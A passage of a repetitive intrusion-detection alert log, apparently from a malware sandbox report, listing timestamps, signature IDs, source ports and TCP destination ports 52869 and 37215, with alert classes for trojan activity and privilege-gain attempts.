                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.648426
                      SID:2829579
                      Source Port:57654
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.440618
                      SID:2027339
                      Source Port:60114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.164569
                      SID:2027339
                      Source Port:56726
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2835222
                      Source Port:58962
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.406154
                      SID:2831300
                      Source Port:60852
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.915956
                      SID:2025132
                      Source Port:40222
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:36.327720
                      SID:2835222
                      Source Port:59144
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.112950
                      SID:2027339
                      Source Port:52180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.753312
                      SID:2027339
                      Source Port:40136
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:24.267901
                      SID:2025132
                      Source Port:40716
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.260797
                      SID:2027339
                      Source Port:55878
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.557200
                      SID:2829579
                      Source Port:37178
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:22.218849
                      SID:2027339
                      Source Port:59988
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.720996
                      SID:2027339
                      Source Port:60056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.264639
                      SID:2831300
                      Source Port:45236
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.497165
                      SID:2831300
                      Source Port:57934
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.863090
                      SID:2829579
                      Source Port:41472
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.576749
                      SID:2835222
                      Source Port:50792
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.444466
                      SID:2027339
                      Source Port:32980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.112360
                      SID:2025132
                      Source Port:38510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.103906
                      SID:2829579
                      Source Port:33066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.121675
                      SID:2027339
                      Source Port:54752
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:02.373413
                      SID:2027339
                      Source Port:37648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:12.623995
                      SID:2027339
                      Source Port:53320
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.565815
                      SID:2831300
                      Source Port:47572
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.480465
                      SID:2027339
                      Source Port:47860
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.183114
                      SID:2025132
                      Source Port:38640
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:14.554681
                      SID:2025132
                      Source Port:52990
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.106820
                      SID:2829579
                      Source Port:53504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.544318
                      SID:2027339
                      Source Port:35636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.056805
                      SID:2025132
                      Source Port:33552
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.171385
                      SID:2025132
                      Source Port:34648
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.278505
                      SID:2027339
                      Source Port:50296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.290845
                      SID:2027339
                      Source Port:37912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.528919
                      SID:2835222
                      Source Port:57752
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.633526
                      SID:2027339
                      Source Port:52838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.086079
                      SID:2829579
                      Source Port:46286
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:56.022964
                      SID:2829579
                      Source Port:51608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.680161
                      SID:2829579
                      Source Port:56766
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.535101
                      SID:2027339
                      Source Port:57810
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.107642
                      SID:2831300
                      Source Port:43200
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.439915
                      SID:2831300
                      Source Port:54962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.280490
                      SID:2027339
                      Source Port:41840
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.435096
                      SID:2829579
                      Source Port:40168
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2829579
                      Source Port:51698
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.486123
                      SID:2831300
                      Source Port:46350
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.457721
                      SID:2027339
                      Source Port:36114
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.656192
                      SID:2835222
                      Source Port:59170
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:21.718589
                      SID:2831300
                      Source Port:42208
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:35.192069
                      SID:2829579
                      Source Port:37122
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.732603
                      SID:2027339
                      Source Port:56358
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.951134
                      SID:2829579
                      Source Port:60260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.427946
                      SID:2027339
                      Source Port:34410
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.862992
                      SID:2829579
                      Source Port:52494
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.517434
                      SID:2027339
                      Source Port:54072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.426493
                      SID:2831300
                      Source Port:39234
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:12.532321
                      SID:2025132
                      Source Port:38148
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:20.550859
                      SID:2027339
                      Source Port:42582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.347403
                      SID:2831300
                      Source Port:47556
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:07:08.228937
                      SID:2025132
                      Source Port:44094
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.510455
                      SID:2829579
                      Source Port:47694
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.319180
                      SID:2027339
                      Source Port:41680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.558741
                      SID:2025132
                      Source Port:44036
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:47.120793
                      SID:2829579
                      Source Port:43894
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.896425
                      SID:2025132
                      Source Port:45322
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:33.857158
                      SID:2835222
                      Source Port:58160
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.026941
                      SID:2027339
                      Source Port:49968
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:50.028546
                      SID:2831300
                      Source Port:33022
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:03.367262
                      SID:2835222
                      Source Port:51814
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:04.023969
                      SID:2027339
                      Source Port:48544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:15.664506
                      SID:2831300
                      Source Port:39684
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:52.503773
                      SID:2831300
                      Source Port:45790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:31.047147
                      SID:2831300
                      Source Port:51010
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.997517
                      SID:2027339
                      Source Port:56314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.225424
                      SID:2831300
                      Source Port:35392
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:47.557250
                      SID:2831300
                      Source Port:40628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.905764
                      SID:2027339
                      Source Port:59292
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:01.391419
                      SID:2027339
                      Source Port:55294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.685214
                      SID:2829579
                      Source Port:58666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.342606
                      SID:2027339
                      Source Port:52790
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:07:06.736138
                      SID:2027339
                      Source Port:41722
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.551649
                      SID:2831300
                      Source Port:43366
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:59.436745
                      SID:2025132
                      Source Port:41462
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.114628
                      SID:2025132
                      Source Port:33972
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.834038
                      SID:2025132
                      Source Port:37882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.344189
                      SID:2831300
                      Source Port:41674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:44.314691
                      SID:2027339
                      Source Port:48180
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.044038
                      SID:2835222
                      Source Port:46260
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:07.406980
                      SID:2027339
                      Source Port:42048
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.389146
                      SID:2829579
                      Source Port:39978
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.657431
                      SID:2025132
                      Source Port:54662
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:07:32.121311
                      SID:2027339
                      Source Port:39564
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.528872
                      SID:2835222
                      Source Port:41582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.105578
                      SID:2835222
                      Source Port:57462
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:44.210907
                      SID:2025132
                      Source Port:39282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.945542
                      SID:2027339
                      Source Port:38966
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.216480
                      SID:2027339
                      Source Port:44670
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:27.576162
                      SID:2027339
                      Source Port:53510
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.335445
                      SID:2025132
                      Source Port:59276
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.466707
                      SID:2831300
                      Source Port:48832
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:38.067768
                      SID:2831300
                      Source Port:43384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:33.855567
                      SID:2835222
                      Source Port:54542
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.539655
                      SID:2831300
                      Source Port:43808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:56.036527
                      SID:2835222
                      Source Port:35820
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:06.291744
                      SID:2831300
                      Source Port:59718
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:15.061851
                      SID:2027339
                      Source Port:43348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:31.841865
                      SID:2027339
                      Source Port:56898
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:37.454499
                      SID:2027339
                      Source Port:35954
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:44.341577
                      SID:2025132
                      Source Port:32880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:38.097414
                      SID:2025132
                      Source Port:45656
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:35.297940
                      SID:2025132
                      Source Port:59544
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.874102
                      SID:2831300
                      Source Port:42518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:25.857963
                      SID:2025132
                      Source Port:56838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.844842
                      SID:2025132
                      Source Port:40916
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:00.516920
                      SID:2831300
                      Source Port:58056
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:42.245742
                      SID:2829579
                      Source Port:38592
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.544570
                      SID:2831300
                      Source Port:51960
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2829579
                      Source Port:55158
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.801547
                      SID:2829579
                      Source Port:57990
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.438620
                      SID:2027339
                      Source Port:36672
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.972089
                      SID:2831300
                      Source Port:57580
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:37.441224
                      SID:2831300
                      Source Port:38538
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:24.662240
                      SID:2027339
                      Source Port:36808
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.119232
                      SID:2027339
                      Source Port:51314
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:18.458631
                      SID:2027339
                      Source Port:33788
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:48.767395
                      SID:2829579
                      Source Port:51922
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.335445
                      SID:2831300
                      Source Port:45680
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:21.143883
                      SID:2027339
                      Source Port:36064
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.938951
                      SID:2025132
                      Source Port:34674
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:56.807816
                      SID:2027339
                      Source Port:49050
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:46.257528
                      SID:2027339
                      Source Port:38636
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.494675
                      SID:2831300
                      Source Port:49616
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:07.761612
                      SID:2027339
                      Source Port:42518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:38.950380
                      SID:2829579
                      Source Port:60316
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.237933
                      SID:2025132
                      Source Port:40268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:02.976833
                      SID:2027339
                      Source Port:33294
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.338978
                      SID:2027339
                      Source Port:55962
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.457796
                      SID:2027339
                      Source Port:56268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:33.830570
                      SID:2829579
                      Source Port:59386
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.441643
                      SID:2025132
                      Source Port:44938
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:01.903875
                      SID:2027339
                      Source Port:55796
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.009321
                      SID:2025132
                      Source Port:34518
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:37.476343
                      SID:2027339
                      Source Port:59062
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:26.155233
                      SID:2025132
                      Source Port:33854
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:57.180627
                      SID:2027339
                      Source Port:48506
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.134757
                      SID:2025132
                      Source Port:57126
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:46.835672
                      SID:2027339
                      Source Port:38880
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.417612
                      SID:2025132
                      Source Port:56742
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:17.683294
                      SID:2027339
                      Source Port:45484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:05.073224
                      SID:2027339
                      Source Port:49240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:39.795410
                      SID:2025132
                      Source Port:50376
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:59.236975
                      SID:2025132
                      Source Port:57348
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:50.498027
                      SID:2835222
                      Source Port:34272
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.316014
                      SID:2027339
                      Source Port:33070
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:35.966789
                      SID:2027339
                      Source Port:37532
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:52.554950
                      SID:2831300
                      Source Port:55838
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:58.972089
                      SID:2027339
                      Source Port:60344
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:29.161519
                      SID:2025132
                      Source Port:33072
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:40.423413
                      SID:2027339
                      Source Port:41084
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:40.486123
                      SID:2831300
                      Source Port:53186
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:05:36.592874
                      SID:2835222
                      Source Port:53018
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:00.927462
                      SID:2831300
                      Source Port:33288
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:18.458632
                      SID:2025132
                      Source Port:48228
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:06:42.090394
                      SID:2027339
                      Source Port:49628
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:34.627949
                      SID:2829579
                      Source Port:46826
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:10.529848
                      SID:2027339
                      Source Port:34470
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:57.797060
                      SID:2027339
                      Source Port:40118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.084343
                      SID:2025132
                      Source Port:39252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted User Privilege Gain
                      Timestamp:07/20/24-23:05:52.493809
                      SID:2831300
                      Source Port:45530
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:Attempted Administrator Privilege Gain
                      Timestamp:07/20/24-23:06:11.328788
                      SID:2027339
                      Source Port:58240
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2835222
                      Source Port:33426
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:59.482880
                      SID:2027339
                      Source Port:33660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:42.143657
                      SID:2829579
                      Source Port:55772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:45.460569
                      SID:2835222
                      Source Port:41372
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:50.557201
                      SID:2835222
                      Source Port:45568
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:58.549030
                      SID:2027339
                      Source Port:48284
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.101729
                      SID:2835222
                      Source Port:37728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:47.371087
                      SID:2027339
                      Source Port:43584
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:06:54.833146
                      SID:2027339
                      Source Port:39282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/20/24-23:05:36.325773
                      SID:2835222
                      Source Port:34302
